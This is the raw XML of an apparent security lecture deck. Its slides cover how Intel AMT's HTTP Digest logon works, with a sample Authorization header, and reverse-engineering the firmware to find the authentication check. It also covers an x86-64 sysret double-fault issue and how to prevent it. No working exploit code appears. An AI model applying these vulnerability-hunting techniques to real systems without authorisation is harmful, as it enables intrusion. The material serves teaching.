          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>[HTML, CSS, JS for logon page]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B606025-5D99-4CCE-87EE-A5A523392617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3010196" y="2722708"/>
            <a:ext cx="6427441" cy="1111239"/>
            <a:chOff x="3010196" y="2722708"/>
            <a:chExt cx="6427441" cy="1111239"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE00629D-38E8-4791-9AEB-0E1CE2C3F689}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3010196" y="3833947"/>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4978C2-8E5F-4CA2-9C42-507CFE339581}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3091009" y="2722708"/>
              <a:ext cx="4641812" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>HTTP GET /index.htm </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A1E024-7AF8-436C-A498-CFA96F534FB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3596336" y="3182030"/>
              <a:ext cx="5374025" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Authorization: [logon info]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337E9A2C-438C-4D26-8062-7139C7E823D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="169908" y="986466"/>
            <a:ext cx="11911482" cy="5683789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273984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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16486FB8-AE62-4A74-833A-51F4029BDA77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="796517"/>
            <a:ext cx="12192000" cy="5653586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6760F1-E802-4E2D-A57D-DB5A8B8C8F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="3489852"/>
            <a:ext cx="11738610" cy="10555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3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCFA387-7B18-4B85-8286-88F4CE36FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9228223" y="1367311"/>
            <a:ext cx="2926218" cy="3834610"/>
            <a:chOff x="8959719" y="3047320"/>
            <a:chExt cx="2926218" cy="3834610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3919E42C-9578-4C62-9394-D6307504B969}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9351321" y="3047320"/>
              <a:ext cx="2265125" cy="2879265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A8E483-133F-4975-9344-329D42AC3E18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8959719" y="5823263"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>AMT-enabled</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E105D6-1C85-43F6-B54E-DB9D9BC4818A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8988959" y="6235599"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56D3D7B-E059-4250-979F-32D5FC7AD569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="73399" y="1511695"/>
            <a:ext cx="2926218" cy="3099108"/>
            <a:chOff x="217778" y="1511695"/>
            <a:chExt cx="2926218" cy="3099108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026" name="Picture 2" descr="Image result for laptop icon">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2443C52-2C64-432D-B1F3-80273CD91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78" y="1511695"/>
              <a:ext cx="2668501" cy="20857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E340A5-D475-4696-ABB7-EACBEDEF0FE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="217778" y="3552136"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Admin</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6387F1DC-7B60-4DE4-9FAA-63DE8C4E0C70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="283114" y="3964472"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B606025-5D99-4CCE-87EE-A5A523392617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3010196" y="917961"/>
            <a:ext cx="6427441" cy="1111239"/>
            <a:chOff x="3010196" y="2722708"/>
            <a:chExt cx="6427441" cy="1111239"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE00629D-38E8-4791-9AEB-0E1CE2C3F689}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3010196" y="3833947"/>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4978C2-8E5F-4CA2-9C42-507CFE339581}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3091009" y="2722708"/>
              <a:ext cx="4641812" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>HTTP GET /index.htm </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A1E024-7AF8-436C-A498-CFA96F534FB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3596336" y="3182030"/>
              <a:ext cx="5374025" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Authorization: [logon info]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94EC855F-607D-409D-A361-87D81C96972F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2734916" y="2039075"/>
            <a:ext cx="8345906" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Authorization: Digest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   username="admin",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   realm="Digest:C80900000000000000",      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   nonce="JOKoAAdFAAApQD4w/l+88v4fscE6y2Ke",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="/index.htm",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   response="7a8df4aa68a83ba59855d7a433522cf7",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>qop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="auth", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=00000001,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="6e8da33dda6b05d8"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE153A5-4DB4-4023-A6A8-24379D9BD968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="60160" y="4496711"/>
            <a:ext cx="9252283" cy="2278431"/>
            <a:chOff x="60160" y="4496711"/>
            <a:chExt cx="9252283" cy="2278431"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A294086A-6C8B-4714-A8AF-E4977F4074A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60160" y="5390147"/>
              <a:ext cx="7127108" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Security goals:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t> Prevent a network eavesdropper from (1) learning the admin password or (2) replaying a successful authentication response</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2050" name="Picture 2" descr="Image result for eavesdropper">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6816DD-A462-42F3-8909-4DB9D10BF1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979" y="4496711"/>
              <a:ext cx="2233464" cy="2233464"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C1B5F0-A0C2-41ED-9CC4-74323FD1D550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5592823" y="2359405"/>
            <a:ext cx="6344667" cy="6061483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263115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27000</TotalTime>
  <Words>4064</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>419</Paragraphs>
  <Slides>33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Bahnschrift</vt:lpstr>
      <vt:lpstr>Bahnschrift Condensed</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Intel Chips Post-2006</vt:lpstr>
      <vt:lpstr>Intel’s Active Management Technology (AMT)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>AMT: Logon Process</vt:lpstr>
      <vt:lpstr>AMT: Logon Process</vt:lpstr>
      <vt:lpstr>AMT: Logon Process</vt:lpstr>
      <vt:lpstr>HTTP Digest Authentication</vt:lpstr>
      <vt:lpstr>Does Intel’s implementation of HTTP Digest Authentication have security flaws?</vt:lpstr>
      <vt:lpstr>Download the firmware . . .</vt:lpstr>
      <vt:lpstr>. . . then decompress it . . .</vt:lpstr>
      <vt:lpstr>. . . then disassemble the binary!</vt:lpstr>
      <vt:lpstr>But how do we figure out where the authentication code is implemented?</vt:lpstr>
      <vt:lpstr>After some investigation, we find the AMT code that compares the client-submitted authentication value to one computed by AMT.</vt:lpstr>
      <vt:lpstr>AMT: Logon Process</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>AMD’s x64 syscall and sysret</vt:lpstr>
      <vt:lpstr>x86-64: Noncanonical Addresses and sysret</vt:lpstr>
      <vt:lpstr>When Does The #GP Happen?</vt:lpstr>
      <vt:lpstr>When Does The #GP Happen?</vt:lpstr>
      <vt:lpstr>What Does x86 Do?</vt:lpstr>
      <vt:lpstr>When Does The #GP Happen?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>When Does The #GP Happen?</vt:lpstr>
      <vt:lpstr>A Double-Fault Will Occur!</vt:lpstr>
      <vt:lpstr>A Double-Fault Will Occur!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Preventing the Attack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9998</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-17T01:11:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-29T22:51:46Z</dcterms:modified>
</cp:coreProperties>
</file>